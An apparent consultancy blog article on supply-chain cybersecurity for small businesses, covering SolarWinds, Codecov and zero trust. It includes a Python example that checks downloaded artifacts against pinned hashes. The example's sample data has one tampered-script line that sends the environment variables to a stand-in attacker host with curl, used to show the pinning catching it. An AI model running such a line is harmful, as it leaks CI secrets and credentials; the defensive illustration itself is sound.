The SolarWinds cyberattack of late 2020 could mark the moment businesses finally confront the scale of challenge they face in securing their supply chains.
SolarWinds reads like a hacker’s fantasy: compromise a single obscure company and in doing so gain secret access to thousands of its highly-prized customers across the world, riding in on a signed, routine software update. Better still, none of the victims would suspect a thing because, after all, SolarWinds was a trusted supplier nobody worried about. If security company FireEye hadn’t joined the dots in December 2020 this extraordinary incident might have gone unnoticed for years rather than months.
SolarWinds isn’t the only recent example of this phenomenon. In April 2021, code-coverage service Codecov disclosed that attackers had tampered with its Bash Uploader script, allowing them to harvest credentials from the CI environments of hundreds of its customers. Likewise, attackers exploited multiple zero-day vulnerabilities in Accellion’s File Transfer Appliance (FTA), leaving the several hundred customers still using it badly exposed. What made the latter particularly telling was that the FTA was a 20 year-old product: a good example of how even legacy supply chains organisations think they’ve moved on from can come back to bite them years later.
None of this was exactly new. In 2011 attackers breached RSA and stole data relating to its highly-regarded SecurID hardware authentication tokens; once that material was used in attacks against RSA’s customers, the company ended up offering to replace around 40 million tokens at huge expense. Everyone thought RSA was an unlucky one-off and everyone, we now know, was wrong.
What Is a Supply Chain?
Supply chains vary by industry sector but can include not only technology providers, but potentially any third-party with which an organisation has a trusted relationship. Every organisation, including SMEs, will have a list of these, usually outsourcing or commercial partners of one sort or another. The danger they pose is proportional to the amount of access they have to a company’s systems, its data, and in some cases its premises.
From a cybersecurity point of view, the problem is that no matter how well an organisation secures its own infrastructure, it can’t be sure that its partners are doing as good a job. The security state of that partner is often taken on trust. Organisations can’t just cut themselves off from outsiders in an era when technology, data sharing and outsourcing have become fundamental to doing business.
Zero Trust
Can such a problem with supply chains ever be solved? Around 15 years ago a group of British CISOs in the Jericho Forum argued for ‘de-perimeterisation’: the idea that the network boundary can no longer be relied on to keep attackers out. That thinking eventually coalesced into what Forrester analyst John Kindervag named ‘zero trust’ in 2010. You’ll find various overlapping definitions of what this means but it can be reduced to a simple principle: assume the worst and trust nobody, inside or outside the network, until they have proved who they are and what they are allowed to do. In the last decade, the rapid growth in cybercrime has turned it from a collection of discussion documents read by a small group of thinkers into the cybersecurity equivalent of the ten commandments.
Supply Chain Security Best Practices
Zero trust principles and best practices can be applied to SME supply chain security in different ways.
- Audit your supply chain, breaking down the list of suppliers into categories depending on the level of risk they pose and their access to your company’s network and data. This will include tech organisations (software, cloud, managed service providers, payment processors), professional services (legal, building security, etc), and partners (component makers, data partners).
- Expand the assurance you require from each partner, for example by asking for penetration test reports and contractual commitments to notify you of data breaches and GDPR violations. Cloud providers should be able to supply System and Organisation Controls (SOC) reports, typically SOC 1, 2 or 3. You have a patching regime, but does your trusted supplier? If they don’t and your data is in their hands, your company is only as secure as they are.
- Lock down the privileges granted to suppliers to the minimum they need, and apply multi-factor authentication to any access they are given. Remember, stolen credentials are a major risk factor, including when they are stolen from third parties. Do the same for interfaces such as VPNs (which are not infallible, by the way) and Remote Desktop Protocol (RDP), both of which are popular targets for ransomware attackers.
- Beware of over-trusting the software supply chain. As a recent report on software supply chain security from the US Cybersecurity and Infrastructure Security Agency (CISA) notes, attacks here include the hijacking of updates, undermining code signing, and compromising open source libraries. SMEs might not realise that these dependencies exist or are part of the supply chain, but everyone is now exposed to some degree. At a minimum, record the hashes or signatures of the installers and dependencies you rely on and refuse anything that no longer matches.
- Take seriously the need for regular penetration tests. These are an excellent way to get insight on the vulnerabilities that might be lurking in hidden supply chains or suppliers nobody has thought to assess for their security.
- Assume attackers are already in your network and go looking for them. Remember, ransomware operators typically spend days or weeks inside a network before the encryption payload is deployed, which means that by the time the ransom note appears on a PC it’s probably too late. The endpoint and other security products you use should be configured on this basis. If using a managed security service provider (MSSP), they need permission not only to detect an attack but to intervene if something is unfolding.
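The software-chain-of-trust point above (hijacked updates, tampered installers, compromised libraries) has a simple, mechanical defence: pin the hash of every third-party artifact you accept and refuse anything that no longer matches. The following is an added example, not code from the original article or from any of the vendors mentioned. It parses a lockfile in the same `--hash=sha256:...` style pip uses for hash-pinned requirements, then checks artifact bytes against the pins. The artifacts, the lockfile and the “tampered uploader” line are all constructed inline so the example runs offline; the package names are hypothetical.

```python
"""Added example: verifying third-party artifacts against pinned sha256 hashes.

Hash pinning counters the hijacked-update and tampered-dependency risks
described above: an installer or dependency is accepted only when its
content hashes to a value recorded when the artifact was first reviewed.
The lockfile format mirrors pip's ``--hash=sha256:<hex>`` pins.
"""
import hashlib
import hmac
import re

# One pin per line: name==version followed by one or more --hash=sha256:<hex>
# (pip allows several hashes for one package, e.g. an sdist and a wheel).
PIN_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.\-]+)==(?P<version>\S+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$"
)


def parse_lockfile(text):
    """Return {name: {"version": str, "hashes": set(hex)}} for each pinned line.

    Blank lines and comments are skipped. Any other line without at least one
    sha256 pin is rejected outright: a single unpinned entry would silently
    downgrade the whole file to 'trust whatever the index serves today'.
    """
    pins = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: entry without a sha256 pin: {line!r}")
        hashes = set(re.findall(r"--hash=sha256:([0-9a-f]{64})", m.group("hashes")))
        pins[m.group("name").lower()] = {"version": m.group("version"), "hashes": hashes}
    return pins


def verify_artifact(name, data, pins):
    """Return True only if sha256(data) matches one of the pinned hashes for name."""
    entry = pins.get(name.lower())
    if entry is None:
        return False  # not in the lockfile: never install unpinned packages
    digest = hashlib.sha256(data).hexdigest()
    # Constant-time comparison against each pin, so a mismatch cannot be told
    # apart from a partial match by timing.
    return any(hmac.compare_digest(digest, pinned) for pinned in entry["hashes"])


def verify_all(artifacts, pins):
    """Map artifact name -> bool for a batch of downloads; usable as a CI gate."""
    return {name: verify_artifact(name, data, pins) for name, data in artifacts.items()}


def _pin(name, version, *blobs):
    """Build a lockfile line from known-good bytes (what you record at review time)."""
    hashes = " ".join("--hash=sha256:" + hashlib.sha256(b).hexdigest() for b in blobs)
    return f"{name}=={version} {hashes}"


# Constructed sample artifacts (hypothetical names and contents).
GOOD_UPLOADER = b"#!/bin/bash\nset -e\ncurl -s -F report=@coverage.xml https://ci.example/upload\n"
# The same script with one injected line that would ship CI secrets to an
# attacker; a hash pin catches this even though the script still 'works'.
TAMPERED_UPLOADER = GOOD_UPLOADER + b'curl -d "$(env)" https://attacker.invalid/\n'
LIB_SDIST = b"constructed sdist bytes for some-lib 2.3.1"
LIB_WHEEL = b"constructed wheel bytes for some-lib 2.3.1"

# Constructed lockfile: the hashes were recorded from the reviewed artifacts.
LOCKFILE = "\n".join([
    "# constructed lockfile; hashes recorded when the artifacts were first reviewed",
    _pin("uploader", "1.0", GOOD_UPLOADER),
    _pin("Some-Lib", "2.3.1", LIB_SDIST, LIB_WHEEL),
])
PINS = parse_lockfile(LOCKFILE)

if __name__ == "__main__":
    results = verify_all({"uploader": TAMPERED_UPLOADER, "some-lib": LIB_WHEEL}, PINS)
    for name, ok in results.items():
        print(f"{name}: {'OK' if ok else 'REJECTED (hash mismatch or unpinned)'}")
```

The parser refuses an unpinned line rather than ignoring it, because the weakest entry in a lockfile sets the trust level for the whole install; the same rule applies to `curl | bash` installers, which should be fetched to disk and checked against a published hash before they are run.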
Conclusion
Cyber security risks are now among the most significant facing today’s businesses, and it is clear that a robust approach to security will be required for most, if not all, organisations. Yet not all business risks are internal and, as this article shows, many result from supplier relationships.
Having agreements in place with your suppliers to address these security risks is critical, as is checking that they are actually adhering to the terms of any agreement.
If you would like to explore options for improving your business security contact us to speak with one of our advisers. We offer a range of services from e-learning for your staff to cyber essentials and ISO 27001 certification. Complete this form or call us on 0800 404 7007 – we’re here to help!